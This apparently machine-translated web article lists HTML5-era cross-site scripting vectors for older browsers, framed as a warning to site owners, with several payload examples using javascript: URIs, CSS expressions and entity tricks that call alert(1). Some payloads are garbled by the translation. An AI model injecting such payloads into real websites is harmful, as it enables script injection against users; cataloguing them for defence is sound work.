The following is a list of almost all security issues related to HTML 5 in various mainstream browsers. These security issues may be a stepping stone for hackers to attack your website, almost all of them are related to Javascript, so you should pay attention to them.
Http://heideri.ch/jso/
The following are a few examples:
1) <table background = "javascript: alert (1)">
IE6, 7,8, 9, and Opera 8.x, 9.x, and 10.x both support this syntax.
2) <meta charset = "mac-farsi"> invalid script using alert (1) failed/script failed
This problem exists in all Firefox versions and allows users to perform XSS (Cross-Site Scripting) attacks.
3) <script> & amp; # x61; l & amp; # x65; rt & amp; #40; 1) </script>
Between the TAG of <script> and <style>, the script can be run based on the TAG. This is problematic in all versions of Firefox, Opera, and Chrome.
4) ({set/**/$ ($) {_/**/setter =$, _ = 1}). $ = alert
The above is a syntax of Firefox and XSS attacks are also generated.
5) <div style = "font-family: foo} x = expression (write (1);"> XXX </div>
Since IE5.5 and later, IE can support the above syntax until IE9.
6) scripts can be run in src, for example:
<Embed src = "javascript: alert (1)">
<Image src = "javascript: alert (1)">
<Script src = "javascript: alert (1)">
Another XSS attack, almost all browsers support this method, such as: All Firefox versions, Chrome 4.x/ 5.x, Opera 8.x/ 9.x/ 10.0, IE 6.0/7.0, and Safari 3.x/ 4.x
There are many other websites that are updated frequently. In general, both IE and Firefox have security issues. Safari seems to be the least problematic.